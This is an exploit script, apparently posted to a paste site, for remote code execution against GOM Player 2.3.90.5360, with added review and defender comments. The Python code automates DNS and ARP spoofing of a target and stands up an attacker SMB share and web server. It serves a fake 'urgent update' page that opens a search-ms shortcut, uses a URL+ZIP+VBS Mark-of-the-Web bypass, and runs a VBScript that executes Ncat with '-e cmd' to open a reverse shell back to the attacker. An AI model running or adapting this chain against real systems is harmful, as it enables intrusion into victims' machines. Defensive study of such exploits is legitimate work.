FlyFar

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Jan 20th, 2024
  1. # Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
  2. # Date: 26.08.2023
  3. # Author: M. Akil Gündoğan
  4. # Contact: https://twitter.com/akilgundogan
  5. # Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
  6. # Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
  7. # Version: 2.3.90.5360
  8. # Tested on: Windows 10 Pro x64 22H2 19045.3324
  9. # PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
  10.  
  11. # Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
  12.  
  13. # Vulnerability Description:
  14. # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
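  15. # SMB/WebDAV+ "search-ms" technique, we can use DNS spoofing (which needs an on-path position on the victim's network) to redirect the victim to the page we created and execute code on the target once the victim opens the shortcut shown to them.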
  16. # In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
  17.  
  18. # Full disclosure, developers should be more careful about software security.
  19.  
  20. # Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen on for the reverse shell.
  21.  
  22. # The code is rough spaghetti, but it works :)
  23.  
  # Banner printed at start-up; the \033[...m sequences are ANSI colour escapes wrapped around the box and the author line.
  24. banner = """\033[38;5;196m+-----------------------------------------------------------+
  25. |     GOM Player 2.3.90.5360 - Remote Code Execution        |
  26. |   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
  27. +-----------------------------------------------------------+\033[0m""" +"""
  28. \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
  29.  
  30. import time,os,zipfile,subprocess,socket,sys
  31.  
  # Print the banner, stop unless running as root, then read the two operator-supplied values.
  32. print(banner)
  33.  
  # Root is presumably needed for what follows (binding TCP port 80 for the web server, and the spoofing tool) - confirm.
  34. if os.geteuid() != 0:
  35.     print("You need root privileges to run the exploit, please use sudo...")
  36.     sys.exit(1)
  37.  
  # NOTE(review): both values are kept as raw input() strings and are later concatenated, unvalidated and unquoted, into shell command lines that run as root.
  38. targetIP = input("- Target IP address: ")
  39. listenPort = input("- Listening port for Reverse Shell: ")
  40.  
  # Write fileContent to fileName in text mode "w", replacing any existing file of that name.
  # NOTE(review): the handle is closed by hand, so it stays open if write() raises; a `with open(...)` block is the usual form.
  41. def fCreate(fileName,fileContent): # File create func.
  42.     f = open(fileName,"w")
  43.     f.write(fileContent)
  44.     f.close()    
  45.  
  # Determine the default gateway, local IP address and hostname of the machine running the script.
  # Assumes the `ip -4 route show default` output begins "default via <gateway> ...", so token 2 is the gateway;
  # with no default route the list is empty and gw[2] raises IndexError.
  46. gw = os.popen("ip -4 route show default").read().split()
  # connect() on a UDP socket sends no traffic; it only makes the kernel pick the source address that getsockname() reports.
  # NOTE(review): this socket is never closed.
  47. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  48. s.connect((gw[2], 0))
  49. ipaddr = s.getsockname()[0]
  50. gateway = gw[2]
  51. host = socket.gethostname()
  52. print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
  53.  
  # Stage 1: create the working tree and fetch three third-party tools into it (Ncat portable, Impacket, DNSSpoof).
  # NOTE(review): none of the downloads is pinned to a commit or checked against a hash, and the fetched code is later run as root;
  # anyone reproducing this in a lab should treat the machine as disposable. Output and exit status of every command are discarded.
  54. print("\n[*]- Stage 1: Downloading neccesary tools...")
  55.  
  # Share name announced by the SMB server and name of the local working directory.
  56. smbFolderName = "GomUpdater" # change this (optional)
  57. expWorkDir = "gomExploitDir" # change this (optional)
  # The trailing "&" runs mkdir in the background, which is why a sleep follows each call.
  58. os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
  59. time.sleep(1) # It's necessary for exploit stability.
  60. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating the smb-shared and web-shared subdirectories.
  61. time.sleep(1) # It's necessary for exploit stability.
  62. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
  63. print("    [*] - Ncat has been downloaded.")
  64. subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
  65. print("    [*] - Impacket has been downloaded.")
  66. subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
  67. print("    [*] - DNSSpoof.py has been downloaded.")
  68.  
  # Stage 2: start Impacket's smbserver.py in the background, exporting ../../smb-shared under the share name in smbFolderName.
  # Defender note: the chain depends on the victim workstation being allowed to open an SMB (or WebDAV) session to an arbitrary peer;
  # blocking or alerting on workstation-to-workstation and outbound SMB removes that precondition.
  69. print("[*]- Stage 2: Creating Attacker SMB Server...")
  70. subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
  71. time.sleep(5) # It's necessary for exploit stability.
  72.  
  # The SMB server address is this machine's own IP as detected earlier.
  73. smbIP = ipaddr
  # Per the author, GOM Player requests this host over plain HTTP; that cleartext fetch is what makes a DNS-spoofing redirect possible.
  # The durable fix is on the vendor side (serving this content over HTTPS with certificate validation).
  74. spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
  75.  
  # Stage 3: write the HTML page that is served in place of the spoofed host.
  76. print("[*]- Stage 3: Creating Attacker Web Page...")
  77.  
  # The page shows an alert (Turkish: "An urgent update is required for GOM Player! Please click the updater in the window that opens.")
  # and then navigates to a search-ms: URI whose location crumb is a UNC path to smbIP.
  # Defender note: a search-ms: URI whose location points at a remote UNC host, raised from a browser or an embedded web control,
  # is a detection point for this step; restricting the search-ms protocol handler is a possible hardening - verify against current vendor guidance.
  78. # change this (optional)
  79. screenExpPage = """
  80. <meta charset="utf-8">
  81. <script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
  82. <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
  83. </script>
  84. """
  85.  
  86. fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
  87. time.sleep(3) # It's necessary for exploit stability.
  88.  
  # Stage 4: build the VBScript payload, zip it, and place a .url shortcut that points into the zip on the share.
  89. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
  # Template script: copies ncat.exe from the share into %temp%, waits five seconds, then starts it minimised with "-e cmd".
  # The words yogurt / ayran / attackerIP / attackerPort are placeholders substituted on the line after the literal.
  # Defender note: host-side indicators visible here are a script host spawning xcopy from a UNC path, ncat.exe appearing in %temp%,
  # and ncat being started with "-e cmd".
  90. vbsCommand = '''Set shell=CreateObject("wscript.shell")
  91. Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
  92. WScript.Sleep 5000
  93. Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
  94. vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
  95. fCreate(expWorkDir + "/payload.vbs",vbsCommand)
  96.  
  # Internet shortcut whose URL addresses payload.vbs inside archive.zip on the remote share; the header comment describes this
  # URL+ZIP+VBS layout as the MoTW bypass that keeps the victim from seeing a warning.
  # NOTE(review): whether the bypass works depends on the Windows build; the header lists only Windows 10 Pro x64 22H2 19045.3324 as tested.
  97. urlShortcut = '''[InternetShortcut]
  98. URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
  99. IDlist='''
  100. fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
  101. time.sleep(3) # It's necessary for exploit stability.
  102. zipName = expWorkDir + "/smb-shared/archive.zip"
  # Same path that payload.vbs was written to above.
  103. payload_filename = os.path.join(expWorkDir, "payload.vbs")  
  104.  
  # Store the script at the archive root under its bare file name.
  105. with zipfile.ZipFile(zipName, "w") as malzip:
  106.     malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
  107.  
  # Stage 5: serve web-shared (screen.html) over HTTP on port 80 in the background.
  108. print("[*]- Stage 5: Running the attacker's web server...")
  109. subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
  110. time.sleep(3) # It's necessary for exploit stability.
  111.  
  # Stage 6: run the downloaded dnsspoof.py against spoofUrl for targetIP. The stage message also mentions ARP spoofing;
  # that logic is not in this file, so presumably the downloaded tool performs it - confirm.
  # Defender note: on the network this stage should appear as ARP anomalies towards the target and as a public hostname resolving
  # to a local address; dynamic ARP inspection and DNS-response monitoring are the corresponding controls.
  # NOTE(review): targetIP and listenPort are concatenated unquoted into these shell strings.
  112. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
  113. subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
  114. time.sleep(10) # It's necessary for exploit stability.
  # The purpose of the ping/arping pair is not stated in the source; presumably it refreshes ARP state - confirm.
  115. os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
  116. os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
  # Stage 7: block on a netcat listener, then stop the three background helpers once it returns.
  # NOTE(review): cleanup only kills processes; the working directory, downloaded tools and generated files stay on disk,
  # and pkill -f matches any process whose command line contains these strings, not only the ones started here.
  117. print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
  118. subprocess.run("nc -lvnp " + listenPort,shell=True)
  119. subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
  120.            